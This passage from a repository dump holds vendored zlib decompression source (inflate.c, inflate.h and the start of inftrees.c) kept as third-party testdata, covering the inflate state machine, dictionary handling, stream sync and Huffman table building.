the same case is attempted again, and if the appropriate resources are provided, the machine proceeds to the next state. The NEEDBITS() macro is usually the way the state evaluates whether it can proceed or should return. NEEDBITS() does the return if the requested bits are not available. The typical use of the BITS macros is: NEEDBITS(n); ... do something with BITS(n) ... DROPBITS(n); where NEEDBITS(n) either returns from inflate() if there isn't enough input left to load n bits into the accumulator, or it continues. BITS(n) gives the low n bits in the accumulator. When done, DROPBITS(n) drops the low n bits off the accumulator. INITBITS() clears the accumulator and sets the number of available bits to zero. BYTEBITS() discards just enough bits to put the accumulator on a byte boundary. After BYTEBITS() and a NEEDBITS(8), then BITS(8) would return the next byte in the stream. NEEDBITS(n) uses PULLBYTE() to get an available byte of input, or to return if there is no input available. The decoding of variable length codes uses PULLBYTE() directly in order to pull just enough bytes to decode the next code, and no more. Some states loop until they get enough input, making sure that enough state information is maintained to continue the loop where it left off if NEEDBITS() returns in the loop. For example, want, need, and keep would all have to actually be part of the saved state in case NEEDBITS() returns: case STATEw: while (want < need) { NEEDBITS(n); keep[want++] = BITS(n); DROPBITS(n); } state = STATEx; case STATEx: As shown above, if the next state is also the next case, then the break is omitted. A state may also return if there is not enough output space available to complete that state. Those states are copying stored data, writing a literal byte, and copying a matching string. When returning, a "goto inf_leave" is used to update the total counters, update the check value, and determine whether any progress has been made during that inflate() call in order to return the proper return code. Progress is defined as a change in either strm->avail_in or strm->avail_out. When there is a window, goto inf_leave will update the window with the last output written. If a goto inf_leave occurs in the middle of decompression and there is no window currently, goto inf_leave will create one and copy output to the window for the next call of inflate(). In this implementation, the flush parameter of inflate() only affects the return code (per zlib.h). inflate() always writes as much as possible to strm->next_out, given the space available and the provided input--the effect documented in zlib.h of Z_SYNC_FLUSH. Furthermore, inflate() always defers the allocation of and copying into a sliding window until necessary, which provides the effect documented in zlib.h for Z_FINISH when the entire input stream available. So the only thing the flush parameter actually does is: when flush is set to Z_FINISH, inflate() cannot return Z_OK. Instead it will return Z_BUF_ERROR if it has not reached the end of the stream. */ int ZEXPORT inflate(z_streamp strm, int flush) { struct inflate_state FAR *state; z_const unsigned char FAR *next; /* next input */ unsigned char FAR *put; /* next output */ unsigned have, left; /* available input and output */ unsigned long hold; /* bit buffer */ unsigned bits; /* bits in bit buffer */ unsigned in, out; /* save starting available input and output */ unsigned copy; /* number of stored or match bytes to copy */ unsigned char FAR *from; /* where to copy match bytes from */ code here; /* current decoding table entry */ code last; /* parent table entry */ unsigned len; /* length to copy for repeats, bits to drop */ int ret; /* return code */ #ifdef GUNZIP unsigned char hbuf[4]; /* buffer for gzip header crc calculation */ #endif static const unsigned short order[19] = /* permutation of code lengths */ {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15}; if (inflateStateCheck(strm) || strm->next_out == Z_NULL || (strm->next_in == Z_NULL && strm->avail_in != 0)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if (state->mode == TYPE) state->mode = TYPEDO; /* skip check */ LOAD(); in = have; out = left; ret = Z_OK; for (;;) switch (state->mode) { case HEAD: if (state->wrap == 0) { state->mode = TYPEDO; break; } NEEDBITS(16); #ifdef GUNZIP if ((state->wrap & 2) && hold == 0x8b1f) { /* gzip header */ if (state->wbits == 0) state->wbits = 15; state->check = crc32(0L, Z_NULL, 0); CRC2(state->check, hold); INITBITS(); state->mode = FLAGS; break; } if (state->head != Z_NULL) state->head->done = -1; if (!(state->wrap & 1) || /* check if zlib header allowed */ #else if ( #endif ((BITS(8) << 8) + (hold >> 8)) % 31) { strm->msg = (char *)"incorrect header check"; state->mode = BAD; break; } if (BITS(4) != Z_DEFLATED) { strm->msg = (char *)"unknown compression method"; state->mode = BAD; break; } DROPBITS(4); len = BITS(4) + 8; if (state->wbits == 0) state->wbits = len; if (len > 15 || len > state->wbits) { strm->msg = (char *)"invalid window size"; state->mode = BAD; break; } state->dmax = 1U << len; state->flags = 0; /* indicate zlib header */ Tracev((stderr, "inflate: zlib header ok\n")); strm->adler = state->check = adler32(0L, Z_NULL, 0); state->mode = hold & 0x200 ? DICTID : TYPE; INITBITS(); break; #ifdef GUNZIP case FLAGS: NEEDBITS(16); state->flags = (int)(hold); if ((state->flags & 0xff) != Z_DEFLATED) { strm->msg = (char *)"unknown compression method"; state->mode = BAD; break; } if (state->flags & 0xe000) { strm->msg = (char *)"unknown header flags set"; state->mode = BAD; break; } if (state->head != Z_NULL) state->head->text = (int)((hold >> 8) & 1); if ((state->flags & 0x0200) && (state->wrap & 4)) CRC2(state->check, hold); INITBITS(); state->mode = TIME; /* fallthrough */ case TIME: NEEDBITS(32); if (state->head != Z_NULL) state->head->time = hold; if ((state->flags & 0x0200) && (state->wrap & 4)) CRC4(state->check, hold); INITBITS(); state->mode = OS; /* fallthrough */ case OS: NEEDBITS(16); if (state->head != Z_NULL) { state->head->xflags = (int)(hold & 0xff); state->head->os = (int)(hold >> 8); } if ((state->flags & 0x0200) && (state->wrap & 4)) CRC2(state->check, hold); INITBITS(); state->mode = EXLEN; /* fallthrough */ case EXLEN: if (state->flags & 0x0400) { NEEDBITS(16); state->length = (unsigned)(hold); if (state->head != Z_NULL) state->head->extra_len = (unsigned)hold; if ((state->flags & 0x0200) && (state->wrap & 4)) CRC2(state->check, hold); INITBITS(); } else if (state->head != Z_NULL) state->head->extra = Z_NULL; state->mode = EXTRA; /* fallthrough */ case EXTRA: if (state->flags & 0x0400) { copy = state->length; if (copy > have) copy = have; if (copy) { if (state->head != Z_NULL && state->head->extra != Z_NULL && (len = state->head->extra_len - state->length) < state->head->extra_max) { zmemcpy(state->head->extra + len, next, len + copy > state->head->extra_max ? state->head->extra_max - len : copy); } if ((state->flags & 0x0200) && (state->wrap & 4)) state->check = crc32(state->check, next, copy); have -= copy; next += copy; state->length -= copy; } if (state->length) goto inf_leave; } state->length = 0; state->mode = NAME; /* fallthrough */ case NAME: if (state->flags & 0x0800) { if (have == 0) goto inf_leave; copy = 0; do { len = (unsigned)(next[copy++]); if (state->head != Z_NULL && state->head->name != Z_NULL && state->length < state->head->name_max) state->head->name[state->length++] = (Bytef)len; } while (len && copy < have); if ((state->flags & 0x0200) && (state->wrap & 4)) state->check = crc32(state->check, next, copy); have -= copy; next += copy; if (len) goto inf_leave; } else if (state->head != Z_NULL) state->head->name = Z_NULL; state->length = 0; state->mode = COMMENT; /* fallthrough */ case COMMENT: if (state->flags & 0x1000) { if (have == 0) goto inf_leave; copy = 0; do { len = (unsigned)(next[copy++]); if (state->head != Z_NULL && state->head->comment != Z_NULL && state->length < state->head->comm_max) state->head->comment[state->length++] = (Bytef)len; } while (len && copy < have); if ((state->flags & 0x0200) && (state->wrap & 4)) state->check = crc32(state->check, next, copy); have -= copy; next += copy; if (len) goto inf_leave; } else if (state->head != Z_NULL) state->head->comment = Z_NULL; state->mode = HCRC; /* fallthrough */ case HCRC: if (state->flags & 0x0200) { NEEDBITS(16); if ((state->wrap & 4) && hold != (state->check & 0xffff)) { strm->msg = (char *)"header crc mismatch"; state->mode = BAD; break; } INITBITS(); } if (state->head != Z_NULL) { state->head->hcrc = (int)((state->flags >> 9) & 1); state->head->done = 1; } strm->adler = state->check = crc32(0L, Z_NULL, 0); state->mode = TYPE; break; #endif case DICTID: NEEDBITS(32); strm->adler = state->check = ZSWAP32(hold); INITBITS(); state->mode = DICT; /* fallthrough */ case DICT: if (state->havedict == 0) { RESTORE(); return Z_NEED_DICT; } strm->adler = state->check = adler32(0L, Z_NULL, 0); state->mode = TYPE; /* fallthrough */ case TYPE: if (flush == Z_BLOCK || flush == Z_TREES) goto inf_leave; /* fallthrough */ case TYPEDO: if (state->last) { BYTEBITS(); state->mode = CHECK; break; } NEEDBITS(3); state->last = BITS(1); DROPBITS(1); switch (BITS(2)) { case 0: /* stored block */ Tracev((stderr, "inflate: stored block%s\n", state->last ? " (last)" : "")); state->mode = STORED; break; case 1: /* fixed block */ fixedtables(state); Tracev((stderr, "inflate: fixed codes block%s\n", state->last ? " (last)" : "")); state->mode = LEN_; /* decode codes */ if (flush == Z_TREES) { DROPBITS(2); goto inf_leave; } break; case 2: /* dynamic block */ Tracev((stderr, "inflate: dynamic codes block%s\n", state->last ? " (last)" : "")); state->mode = TABLE; break; case 3: strm->msg = (char *)"invalid block type"; state->mode = BAD; } DROPBITS(2); break; case STORED: BYTEBITS(); /* go to byte boundary */ NEEDBITS(32); if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) { strm->msg = (char *)"invalid stored block lengths"; state->mode = BAD; break; } state->length = (unsigned)hold & 0xffff; Tracev((stderr, "inflate: stored length %u\n", state->length)); INITBITS(); state->mode = COPY_; if (flush == Z_TREES) goto inf_leave; /* fallthrough */ case COPY_: state->mode = COPY; /* fallthrough */ case COPY: copy = state->length; if (copy) { if (copy > have) copy = have; if (copy > left) copy = left; if (copy == 0) goto inf_leave; zmemcpy(put, next, copy); have -= copy; next += copy; left -= copy; put += copy; state->length -= copy; break; } Tracev((stderr, "inflate: stored end\n")); state->mode = TYPE; break; case TABLE: NEEDBITS(14); state->nlen = BITS(5) + 257; DROPBITS(5); state->ndist = BITS(5) + 1; DROPBITS(5); state->ncode = BITS(4) + 4; DROPBITS(4); #ifndef PKZIP_BUG_WORKAROUND if (state->nlen > 286 || state->ndist > 30) { strm->msg = (char *)"too many length or distance symbols"; state->mode = BAD; break; } #endif Tracev((stderr, "inflate: table sizes ok\n")); state->have = 0; state->mode = LENLENS; /* fallthrough */ case LENLENS: while (state->have < state->ncode) { NEEDBITS(3); state->lens[order[state->have++]] = (unsigned short)BITS(3); DROPBITS(3); } while (state->have < 19) state->lens[order[state->have++]] = 0; state->next = state->codes; state->lencode = (const code FAR *)(state->next); state->lenbits = 7; ret = inflate_table(CODES, state->lens, 19, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid code lengths set"; state->mode = BAD; break; } Tracev((stderr, "inflate: code lengths ok\n")); state->have = 0; state->mode = CODELENS; /* fallthrough */ case CODELENS: while (state->have < state->nlen + state->ndist) { for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.val < 16) { DROPBITS(here.bits); state->lens[state->have++] = here.val; } else { if (here.val == 16) { NEEDBITS(here.bits + 2); DROPBITS(here.bits); if (state->have == 0) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } len = state->lens[state->have - 1]; copy = 3 + BITS(2); DROPBITS(2); } else if (here.val == 17) { NEEDBITS(here.bits + 3); DROPBITS(here.bits); len = 0; copy = 3 + BITS(3); DROPBITS(3); } else { NEEDBITS(here.bits + 7); DROPBITS(here.bits); len = 0; copy = 11 + BITS(7); DROPBITS(7); } if (state->have + copy > state->nlen + state->ndist) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } while (copy--) state->lens[state->have++] = (unsigned short)len; } } /* handle error breaks in while */ if (state->mode == BAD) break; /* check for end-of-block code (better have one) */ if (state->lens[256] == 0) { strm->msg = (char *)"invalid code -- missing end-of-block"; state->mode = BAD; break; } /* build code tables -- note: do not change the lenbits or distbits values here (9 and 6) without reading the comments in inftrees.h concerning the ENOUGH constants, which depend on those values */ state->next = state->codes; state->lencode = (const code FAR *)(state->next); state->lenbits = 9; ret = inflate_table(LENS, state->lens, state->nlen, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid literal/lengths set"; state->mode = BAD; break; } state->distcode = (const code FAR *)(state->next); state->distbits = 6; ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist, &(state->next), &(state->distbits), state->work); if (ret) { strm->msg = (char *)"invalid distances set"; state->mode = BAD; break; } Tracev((stderr, "inflate: codes ok\n")); state->mode = LEN_; if (flush == Z_TREES) goto inf_leave; /* fallthrough */ case LEN_: state->mode = LEN; /* fallthrough */ case LEN: if (have >= 6 && left >= 258) { RESTORE(); inflate_fast(strm, out); LOAD(); if (state->mode == TYPE) state->back = -1; break; } state->back = 0; for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.op && (here.op & 0xf0) == 0) { last = here; for (;;) { here = state->lencode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); state->back += last.bits; } DROPBITS(here.bits); state->back += here.bits; state->length = (unsigned)here.val; if ((int)(here.op) == 0) { Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ? "inflate: literal '%c'\n" : "inflate: literal 0x%02x\n", here.val)); state->mode = LIT; break; } if (here.op & 32) { Tracevv((stderr, "inflate: end of block\n")); state->back = -1; state->mode = TYPE; break; } if (here.op & 64) { strm->msg = (char *)"invalid literal/length code"; state->mode = BAD; break; } state->extra = (unsigned)(here.op) & 15; state->mode = LENEXT; /* fallthrough */ case LENEXT: if (state->extra) { NEEDBITS(state->extra); state->length += BITS(state->extra); DROPBITS(state->extra); state->back += state->extra; } Tracevv((stderr, "inflate: length %u\n", state->length)); state->was = state->length; state->mode = DIST; /* fallthrough */ case DIST: for (;;) { here = state->distcode[BITS(state->distbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if ((here.op & 0xf0) == 0) { last = here; for (;;) { here = state->distcode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); state->back += last.bits; } DROPBITS(here.bits); state->back += here.bits; if (here.op & 64) { strm->msg = (char *)"invalid distance code"; state->mode = BAD; break; } state->offset = (unsigned)here.val; state->extra = (unsigned)(here.op) & 15; state->mode = DISTEXT; /* fallthrough */ case DISTEXT: if (state->extra) { NEEDBITS(state->extra); state->offset += BITS(state->extra); DROPBITS(state->extra); state->back += state->extra; } #ifdef INFLATE_STRICT if (state->offset > state->dmax) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } #endif Tracevv((stderr, "inflate: distance %u\n", state->offset)); state->mode = MATCH; /* fallthrough */ case MATCH: if (left == 0) goto inf_leave; copy = out - left; if (state->offset > copy) { /* copy from window */ copy = state->offset - copy; if (copy > state->whave) { if (state->sane) { strm->msg = (char *)"invalid distance too far back"; state->mode = BAD; break; } #ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR Trace((stderr, "inflate.c too far\n")); copy -= state->whave; if (copy > state->length) copy = state->length; if (copy > left) copy = left; left -= copy; state->length -= copy; do { *put++ = 0; } while (--copy); if (state->length == 0) state->mode = LEN; break; #endif } if (copy > state->wnext) { copy -= state->wnext; from = state->window + (state->wsize - copy); } else from = state->window + (state->wnext - copy); if (copy > state->length) copy = state->length; } else { /* copy from output */ from = put - state->offset; copy = state->length; } if (copy > left) copy = left; left -= copy; state->length -= copy; do { *put++ = *from++; } while (--copy); if (state->length == 0) state->mode = LEN; break; case LIT: if (left == 0) goto inf_leave; *put++ = (unsigned char)(state->length); left--; state->mode = LEN; break; case CHECK: if (state->wrap) { NEEDBITS(32); out -= left; strm->total_out += out; state->total += out; if ((state->wrap & 4) && out) strm->adler = state->check = UPDATE_CHECK(state->check, put - out, out); out = left; if ((state->wrap & 4) && ( #ifdef GUNZIP state->flags ? hold : #endif ZSWAP32(hold)) != state->check) { strm->msg = (char *)"incorrect data check"; state->mode = BAD; break; } INITBITS(); Tracev((stderr, "inflate: check matches trailer\n")); } #ifdef GUNZIP state->mode = LENGTH; /* fallthrough */ case LENGTH: if (state->wrap && state->flags) { NEEDBITS(32); if ((state->wrap & 4) && hold != (state->total & 0xffffffff)) { strm->msg = (char *)"incorrect length check"; state->mode = BAD; break; } INITBITS(); Tracev((stderr, "inflate: length matches trailer\n")); } #endif state->mode = DONE; /* fallthrough */ case DONE: ret = Z_STREAM_END; goto inf_leave; case BAD: ret = Z_DATA_ERROR; goto inf_leave; case MEM: return Z_MEM_ERROR; case SYNC: /* fallthrough */ default: return Z_STREAM_ERROR; } /* Return from inflate(), updating the total counts and the check value. If there was no progress during the inflate() call, return a buffer error. Call updatewindow() to create and/or update the window state. Note: a memory error from inflate() is non-recoverable. */ inf_leave: RESTORE(); if (state->wsize || (out != strm->avail_out && state->mode < BAD && (state->mode < CHECK || flush != Z_FINISH))) if (updatewindow(strm, strm->next_out, out - strm->avail_out)) { state->mode = MEM; return Z_MEM_ERROR; } in -= strm->avail_in; out -= strm->avail_out; strm->total_in += in; strm->total_out += out; state->total += out; if ((state->wrap & 4) && out) strm->adler = state->check = UPDATE_CHECK(state->check, strm->next_out - out, out); strm->data_type = (int)state->bits + (state->last ? 64 : 0) + (state->mode == TYPE ? 128 : 0) + (state->mode == LEN_ || state->mode == COPY_ ? 256 : 0); if (((in == 0 && out == 0) || flush == Z_FINISH) && ret == Z_OK) ret = Z_BUF_ERROR; return ret; } int ZEXPORT inflateEnd(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if (state->window != Z_NULL) ZFREE(strm, state->window); ZFREE(strm, strm->state); strm->state = Z_NULL; Tracev((stderr, "inflate: end\n")); return Z_OK; } int ZEXPORT inflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength) { struct inflate_state FAR *state; /* check state */ if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; /* copy dictionary */ if (state->whave && dictionary != Z_NULL) { zmemcpy(dictionary, state->window + state->wnext, state->whave - state->wnext); zmemcpy(dictionary + state->whave - state->wnext, state->window, state->wnext); } if (dictLength != Z_NULL) *dictLength = state->whave; return Z_OK; } int ZEXPORT inflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength) { struct inflate_state FAR *state; unsigned long dictid; int ret; /* check state */ if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if (state->wrap != 0 && state->mode != DICT) return Z_STREAM_ERROR; /* check for correct dictionary identifier */ if (state->mode == DICT) { dictid = adler32(0L, Z_NULL, 0); dictid = adler32(dictid, dictionary, dictLength); if (dictid != state->check) return Z_DATA_ERROR; } /* copy dictionary to window using updatewindow(), which will amend the existing dictionary if appropriate */ ret = updatewindow(strm, dictionary + dictLength, dictLength); if (ret) { state->mode = MEM; return Z_MEM_ERROR; } state->havedict = 1; Tracev((stderr, "inflate: dictionary set\n")); return Z_OK; } int ZEXPORT inflateGetHeader(z_streamp strm, gz_headerp head) { struct inflate_state FAR *state; /* check state */ if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if ((state->wrap & 2) == 0) return Z_STREAM_ERROR; /* save header structure */ state->head = head; head->done = 0; return Z_OK; } /* Search buf[0..len-1] for the pattern: 0, 0, 0xff, 0xff. Return when found or when out of input. When called, *have is the number of pattern bytes found in order so far, in 0..3. On return *have is updated to the new state. If on return *have equals four, then the pattern was found and the return value is how many bytes were read including the last byte of the pattern. If *have is less than four, then the pattern has not been found yet and the return value is len. In the latter case, syncsearch() can be called again with more data and the *have state. *have is initialized to zero for the first call. */ local unsigned syncsearch(unsigned FAR *have, const unsigned char FAR *buf, unsigned len) { unsigned got; unsigned next; got = *have; next = 0; while (next < len && got < 4) { if ((int)(buf[next]) == (got < 2 ? 0 : 0xff)) got++; else if (buf[next]) got = 0; else got = 4 - got; next++; } *have = got; return next; } int ZEXPORT inflateSync(z_streamp strm) { unsigned len; /* number of bytes to look at or looked at */ int flags; /* temporary to save header status */ unsigned long in, out; /* temporary to save total_in and total_out */ unsigned char buf[4]; /* to restore bit buffer to byte string */ struct inflate_state FAR *state; /* check parameters */ if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if (strm->avail_in == 0 && state->bits < 8) return Z_BUF_ERROR; /* if first time, start search in bit buffer */ if (state->mode != SYNC) { state->mode = SYNC; state->hold <<= state->bits & 7; state->bits -= state->bits & 7; len = 0; while (state->bits >= 8) { buf[len++] = (unsigned char)(state->hold); state->hold >>= 8; state->bits -= 8; } state->have = 0; syncsearch(&(state->have), buf, len); } /* search available input */ len = syncsearch(&(state->have), strm->next_in, strm->avail_in); strm->avail_in -= len; strm->next_in += len; strm->total_in += len; /* return no joy or set up to restart inflate() on a new block */ if (state->have != 4) return Z_DATA_ERROR; if (state->flags == -1) state->wrap = 0; /* if no header yet, treat as raw */ else state->wrap &= ~4; /* no point in computing a check value now */ flags = state->flags; in = strm->total_in; out = strm->total_out; inflateReset(strm); strm->total_in = in; strm->total_out = out; state->flags = flags; state->mode = TYPE; return Z_OK; } /* Returns true if inflate is currently at the end of a block generated by Z_SYNC_FLUSH or Z_FULL_FLUSH. This function is used by one PPP implementation to provide an additional safety check. PPP uses Z_SYNC_FLUSH but removes the length bytes of the resulting empty stored block. When decompressing, PPP checks that at the end of input packet, inflate is waiting for these length bytes. */ int ZEXPORT inflateSyncPoint(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; return state->mode == STORED && state->bits == 0; } int ZEXPORT inflateCopy(z_streamp dest, z_streamp source) { struct inflate_state FAR *state; struct inflate_state FAR *copy; unsigned char FAR *window; unsigned wsize; /* check input */ if (inflateStateCheck(source) || dest == Z_NULL) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)source->state; /* allocate space */ copy = (struct inflate_state FAR *) ZALLOC(source, 1, sizeof(struct inflate_state)); if (copy == Z_NULL) return Z_MEM_ERROR; window = Z_NULL; if (state->window != Z_NULL) { window = (unsigned char FAR *) ZALLOC(source, 1U << state->wbits, sizeof(unsigned char)); if (window == Z_NULL) { ZFREE(source, copy); return Z_MEM_ERROR; } } /* copy state */ zmemcpy((voidpf)dest, (voidpf)source, sizeof(z_stream)); zmemcpy((voidpf)copy, (voidpf)state, sizeof(struct inflate_state)); copy->strm = dest; if (state->lencode >= state->codes && state->lencode <= state->codes + ENOUGH - 1) { copy->lencode = copy->codes + (state->lencode - state->codes); copy->distcode = copy->codes + (state->distcode - state->codes); } copy->next = copy->codes + (state->next - state->codes); if (window != Z_NULL) { wsize = 1U << state->wbits; zmemcpy(window, state->window, wsize); } copy->window = window; dest->state = (struct internal_state FAR *)copy; return Z_OK; } int ZEXPORT inflateUndermine(z_streamp strm, int subvert) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; #ifdef INFLATE_ALLOW_INVALID_DISTANCE_TOOFAR_ARRR state->sane = !subvert; return Z_OK; #else (void)subvert; state->sane = 1; return Z_DATA_ERROR; #endif } int ZEXPORT inflateValidate(z_streamp strm, int check) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; if (check && state->wrap) state->wrap |= 4; else state->wrap &= ~4; return Z_OK; } long ZEXPORT inflateMark(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return -(1L << 16); state = (struct inflate_state FAR *)strm->state; return (long)(((unsigned long)((long)state->back)) << 16) + (state->mode == COPY ? state->length : (state->mode == MATCH ? state->was - state->length : 0)); } unsigned long ZEXPORT inflateCodesUsed(z_streamp strm) { struct inflate_state FAR *state; if (inflateStateCheck(strm)) return (unsigned long)-1; state = (struct inflate_state FAR *)strm->state; return (unsigned long)(state->next - state->codes); } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inflate.h ================================================ /* inflate.h -- internal inflate state definition * Copyright (C) 1995-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* define NO_GZIP when compiling if you want to disable gzip header and trailer decoding by inflate(). NO_GZIP would be used to avoid linking in the crc code when it is not needed. For shared libraries, gzip decoding should be left enabled. */ #ifndef NO_GZIP # define GUNZIP #endif /* Possible inflate modes between inflate() calls */ typedef enum { HEAD = 16180, /* i: waiting for magic header */ FLAGS, /* i: waiting for method and flags (gzip) */ TIME, /* i: waiting for modification time (gzip) */ OS, /* i: waiting for extra flags and operating system (gzip) */ EXLEN, /* i: waiting for extra length (gzip) */ EXTRA, /* i: waiting for extra bytes (gzip) */ NAME, /* i: waiting for end of file name (gzip) */ COMMENT, /* i: waiting for end of comment (gzip) */ HCRC, /* i: waiting for header crc (gzip) */ DICTID, /* i: waiting for dictionary check value */ DICT, /* waiting for inflateSetDictionary() call */ TYPE, /* i: waiting for type bits, including last-flag bit */ TYPEDO, /* i: same, but skip check to exit inflate on new block */ STORED, /* i: waiting for stored size (length and complement) */ COPY_, /* i/o: same as COPY below, but only first time in */ COPY, /* i/o: waiting for input or output to copy stored block */ TABLE, /* i: waiting for dynamic block table lengths */ LENLENS, /* i: waiting for code length code lengths */ CODELENS, /* i: waiting for length/lit and distance code lengths */ LEN_, /* i: same as LEN below, but only first time in */ LEN, /* i: waiting for length/lit/eob code */ LENEXT, /* i: waiting for length extra bits */ DIST, /* i: waiting for distance code */ DISTEXT, /* i: waiting for distance extra bits */ MATCH, /* o: waiting for output space to copy string */ LIT, /* o: waiting for output space to write literal */ CHECK, /* i: waiting for 32-bit check value */ LENGTH, /* i: waiting for 32-bit length (gzip) */ DONE, /* finished check, done -- remain here until reset */ BAD, /* got a data error -- remain here until reset */ MEM, /* got an inflate() memory error -- remain here until reset */ SYNC /* looking for synchronization bytes to restart inflate() */ } inflate_mode; /* State transitions between above modes - (most modes can go to BAD or MEM on error -- not shown for clarity) Process header: HEAD -> (gzip) or (zlib) or (raw) (gzip) -> FLAGS -> TIME -> OS -> EXLEN -> EXTRA -> NAME -> COMMENT -> HCRC -> TYPE (zlib) -> DICTID or TYPE DICTID -> DICT -> TYPE (raw) -> TYPEDO Read deflate blocks: TYPE -> TYPEDO -> STORED or TABLE or LEN_ or CHECK STORED -> COPY_ -> COPY -> TYPE TABLE -> LENLENS -> CODELENS -> LEN_ LEN_ -> LEN Read deflate codes in fixed or dynamic block: LEN -> LENEXT or LIT or TYPE LENEXT -> DIST -> DISTEXT -> MATCH -> LEN LIT -> LEN Process trailer: CHECK -> LENGTH -> DONE */ /* State maintained between inflate() calls -- approximately 7K bytes, not including the allocated sliding window, which is up to 32K bytes. */ struct inflate_state { z_streamp strm; /* pointer back to this zlib stream */ inflate_mode mode; /* current inflate mode */ int last; /* true if processing last block */ int wrap; /* bit 0 true for zlib, bit 1 true for gzip, bit 2 true to validate check value */ int havedict; /* true if dictionary provided */ int flags; /* gzip header method and flags, 0 if zlib, or -1 if raw or no header yet */ unsigned dmax; /* zlib header max distance (INFLATE_STRICT) */ unsigned long check; /* protected copy of check value */ unsigned long total; /* protected copy of output count */ gz_headerp head; /* where to save gzip header information */ /* sliding window */ unsigned wbits; /* log base 2 of requested window size */ unsigned wsize; /* window size or zero if not using window */ unsigned whave; /* valid bytes in the window */ unsigned wnext; /* window write index */ unsigned char FAR *window; /* allocated sliding window, if needed */ /* bit accumulator */ unsigned long hold; /* input bit accumulator */ unsigned bits; /* number of bits in "in" */ /* for string and stored block copying */ unsigned length; /* literal or length of data to copy */ unsigned offset; /* distance back to copy string from */ /* for table and code decoding */ unsigned extra; /* extra bits needed */ /* fixed and dynamic code tables */ code const FAR *lencode; /* starting table for length/literal codes */ code const FAR *distcode; /* starting table for distance codes */ unsigned lenbits; /* index bits for lencode */ unsigned distbits; /* index bits for distcode */ /* dynamic table building */ unsigned ncode; /* number of code length code lengths */ unsigned nlen; /* number of length code lengths */ unsigned ndist; /* number of distance code lengths */ unsigned have; /* number of code lengths in lens[] */ code FAR *next; /* next available space in codes[] */ unsigned short lens[320]; /* temporary storage for code lengths */ unsigned short work[288]; /* work area for code table building */ code codes[ENOUGH]; /* space for code tables */ int sane; /* if false, allow invalid distance too far */ int back; /* bits back of last unprocessed length/lit */ unsigned was; /* initial length of match */ }; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inftrees.c ================================================ /* inftrees.c -- generate Huffman trees for efficient decoding * Copyright (C) 1995-2023 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "zutil.h" #include "inftrees.h" #define MAXBITS 15 const char inflate_copyright[] = " inflate 1.3 Copyright 1995-2023 Mark Adler "; /* If you use the zlib library in a product, an acknowledgment is welcome in the documentation of your product. If for some reason you cannot include such an acknowledgment, I would appreciate that you keep this copyright string in the executable of your product. */ /* Build a set of tables to decode the provided canonical Huffman code. The code lengths are lens[0..codes-1]. The result starts at *table, whose indices are 0..2^bits-1. work is a writable array of at least lens shorts, which is used as a work area. type is the type of code to be generated, CODES, LENS, or DISTS. On return, zero is success, -1 is an invalid code, and +1 means that ENOUGH isn't enough. table on return points to the next available entry's address. bits is the requested root table index bits, and on return it is the actual root table index bits. It will differ if the request is greater than the longest code or if it is less than the shortest code. */ int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens, unsigned codes, code FAR * FAR *table, unsigned FAR *bits, unsigned short FAR *work) { unsigned len; /* a code's length in bits */ unsigned sym; /* index of code symbols */ unsigned min, max; /* minimum and maximum code lengths */ unsigned root; /* number of index bits for root table */ unsigned curr; /* number of index bits for current table */ unsigned drop; /* code bits to drop for sub-table */ int left; /* number of prefix codes available */ unsigned used; /* code entries in table used */ unsigned huff; /* Huffman code */ unsigned incr; /* for incrementing code, index */ unsigned fill; /* index for replicating entries */ unsigned low; /* low bits for current root entry */ unsigned mask; /* mask for low root bits */ code here; /* table entry for duplication */ code FAR *next; /* next available space in table */ const unsigned short FAR *base; /* base value table to use */ const unsigned short FAR *extra; /* extra bits table to use */ unsigned match; /* use base and extra for symbol >= match */ unsigned short 